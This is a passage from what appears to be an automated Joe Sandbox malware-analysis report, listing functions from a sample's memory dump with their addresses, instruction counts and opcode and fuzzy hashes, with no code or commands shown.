              Function 00FA2020 Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 21798ae4bfecfd3e44d45c10d72cf123e65ff8c4a0b3848ca18bed9e1fbcea41
              • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
              • Opcode Fuzzy Hash: 21798ae4bfecfd3e44d45c10d72cf123e65ff8c4a0b3848ca18bed9e1fbcea41
              • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
              Function 00FA8258 Relevance: .0, Instructions: 18COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
              • Instruction ID: 63c084b0e8dd36b57f8a1d66796fc6655c30790c010aa8d32eb801b027b533a1
              • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
              • Instruction Fuzzy Hash: B8C0127350C1242A9624104F7C40AB3678CC2C27F49250137F55C9320068825C4111A4
              Function 00FAA70D Relevance: .0, Instructions: 16COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b3b1492489eb4f1bda235960c84518fcc9ac0b67a1a8d0023b346e95f09777c
              • Instruction ID: 45cd1a34f1ac319989e05bddc210c02a284954bedc65e20b296abef16e567721
              • Opcode Fuzzy Hash: 9b3b1492489eb4f1bda235960c84518fcc9ac0b67a1a8d0023b346e95f09777c
              • Instruction Fuzzy Hash: 5BD0677BB410189FCB049F98EC408DDBBB6FB9C221B048526E915A3261C6319925DB50
              Function 00FA5EA8 Relevance: .0, Instructions: 16COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6f3736c50b92b7e74f09ccf821b12762c9db924a79292a6daf7f42a582992b41
              • Instruction ID: 585e24b1f0a7ee7822f33c37684f918a48d4186ece424a3887ab790585909ef0
              • Opcode Fuzzy Hash: 6f3736c50b92b7e74f09ccf821b12762c9db924a79292a6daf7f42a582992b41
              • Instruction Fuzzy Hash: E4E02B70A4C3820FC717F778F9654AC3F2AAE90208B5445B4A8414E12BEA794C1FCF60
              Function 00FAFC03 Relevance: .0, Instructions: 15COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5468d53e80bb30e485bb6b68ba28b9321ebcf43dc8cf605e9905ba2e5b41125b
              • Instruction ID: 5d517df7fdcdd49077e1a2a4d281db5c648c79c1c9054949155a43f948104bfb
              • Opcode Fuzzy Hash: 5468d53e80bb30e485bb6b68ba28b9321ebcf43dc8cf605e9905ba2e5b41125b
              • Instruction Fuzzy Hash: E4D06779D4411C8BCB20DFA4DA556ECB7B4EF85310F0024E69809B6210D6305A549F11
              Function 00FA5EB8 Relevance: .0, Instructions: 12COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e0d3796752854fb9a4ace3e675cd25cb44e2030f24e4e2660e1b7fd66938c96f
              • Instruction ID: 58f98747b62aa8f6c2420810b7e3f75485ced70131b71bb138e3e0b95b871099
              • Opcode Fuzzy Hash: e0d3796752854fb9a4ace3e675cd25cb44e2030f24e4e2660e1b7fd66938c96f
              • Instruction Fuzzy Hash: 59C012305583094FD549FBB5FA45919771EFAD0304F504520B00A0E12DEF7C5958CAA0

              Non-executed Functions

              Function 00FA6088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: \;]q$\;]q$\;]q$\;]q
              • API String ID: 0-2351511683
              • Opcode ID: 5852b15caf328a4c314f83ab7b3e5171a79a55e19b27bf552344a55e659ace27
              • Instruction ID: 841926f81a9a25e46616c43be52f26e155e149191aff63d812e20ecb271876e2
              • Opcode Fuzzy Hash: 5852b15caf328a4c314f83ab7b3e5171a79a55e19b27bf552344a55e659ace27
              • Instruction Fuzzy Hash: 0901D4B2B140148FCB648E2CC480A2577EAEF9A770329C17AE501CB3B4DA71DC81E750